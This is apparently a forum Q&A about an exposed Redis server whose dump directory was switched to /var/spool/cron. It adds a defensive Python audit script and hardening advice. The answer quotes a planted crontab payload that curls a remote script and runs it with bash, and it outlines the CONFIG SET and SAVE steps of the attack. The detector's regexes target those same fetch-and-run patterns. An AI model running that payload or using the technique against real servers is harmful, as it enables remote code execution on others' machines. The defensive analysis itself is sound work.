I have set up my redis-server so that CONFIG GET dir --> "/var/lib/redis" and CONFIG GET dbfilename --> "redis.rdb".
However, after my server has been running a few hours or a few days, I start getting the "Failed opening .rdb for saving: Permission denied" error.
If I again do CONFIG GET dir --> "/var/spool/cron" and CONFIG GET dbfilename --> "root". I have tried looking all over the place for some kind of understanding of what is happening, but to no avail.
If I simply restart my redis-server, then the config is once again reset to the original settings that I set up in the "redis.conf" file.
This is indeed an attack. If you check your redis keys after this happens you will see a few "string" keys like this: "Backup1", "Backup2", "Backup3".
The value of these will be something like this:
"\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t"
This is meant to modify your crontab.
Bottom line is - don't have redis port opened to the world.
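The answer above describes the classic unauthenticated-Redis cron hijack: the attacker runs CONFIG SET dir /var/spool/cron, CONFIG SET dbfilename root, stores a crontab line in a key and issues SAVE, so the RDB file lands where cron reads it (cron skips the binary junk around the one valid line). The following is an added audit script, not code from the original question or answer, that checks a Redis config snapshot and a set of key values for exactly those two symptoms. The sample config and keys are constructed here to mirror the values quoted in the thread; in practice you would feed it the output of redis-cli CONFIG GET dir, CONFIG GET dbfilename and GET on each key, and the list of sensitive directories is an assumption you can extend.

```python
import re

# Constructed sample input modelled on the question and answer above.
# In real use, collect these with redis-cli (CONFIG GET dir, CONFIG GET
# dbfilename, --scan + GET); nothing here was captured from a live server.
SAMPLE_CONFIG = {"dir": "/var/spool/cron", "dbfilename": "root"}
SAMPLE_KEYS = {
    "Backup1": "\t\n*/2 * * * * curl -s https://transfer.sh/QMvW6/tmp.M8pAEgBA6T > .cmd && bash .cmd\n\t",
    "session:42": "user=alice",
}

# Directories an attacker points `dir` at with CONFIG SET + SAVE, because a
# file written there is parsed by another program (cron, sshd, a web server).
# Assumed list; add whatever is sensitive on your hosts.
SENSITIVE_DIRS = ("/var/spool/cron", "/etc/cron.d", "/root/.ssh", "/home", "/var/www")

# A crontab schedule: five fields of digits, '*', '/', ',', '-' followed by a command.
CRON_LINE = re.compile(r"^\s*(?:[\d*/,-]+\s+){5}\S", re.M)
# A downloader plus a shell that runs what was fetched ("... | sh" or "... && bash x").
FETCH = re.compile(r"\b(?:curl|wget)\b")
RUN = re.compile(r"(?:\|\s*|&&\s*)(?:ba)?sh\b")


def dump_target_is_suspicious(config):
    """True if dir/dbfilename point at a location another program will read."""
    d = config.get("dir", "").rstrip("/")
    return any(d == s or d.startswith(s + "/") for s in SENSITIVE_DIRS)


def find_cron_payloads(keys):
    """Names of keys whose value holds a crontab line that downloads and runs code."""
    hits = []
    for name, value in keys.items():
        if CRON_LINE.search(value) and FETCH.search(value) and RUN.search(value):
            hits.append(name)
    return sorted(hits)


def audit(config, keys):
    """Return human-readable findings; an empty list means neither symptom is present."""
    findings = []
    if dump_target_is_suspicious(config):
        findings.append(
            "RDB dump target %s/%s is outside the data directory; the server's "
            "dir/dbfilename were changed at runtime" % (config.get("dir"), config.get("dbfilename"))
        )
    for name in find_cron_payloads(keys):
        findings.append("key %r holds a cron line that fetches and executes a script" % name)
    return findings


if __name__ == "__main__":
    for line in audit(SAMPLE_CONFIG, SAMPLE_KEYS):
        print("FINDING:", line)
```

Run it against a clean instance (dir /var/lib/redis, no such keys) and it reports nothing; against the values from the thread it reports both the relocated dump target and the Backup1 key. The fix is the one the answer gives, made concrete in redis.conf: bind 127.0.0.1, protected-mode yes, a strong requirepass, and rename-command CONFIG "" so a client that does reach the port cannot move the dump file at all.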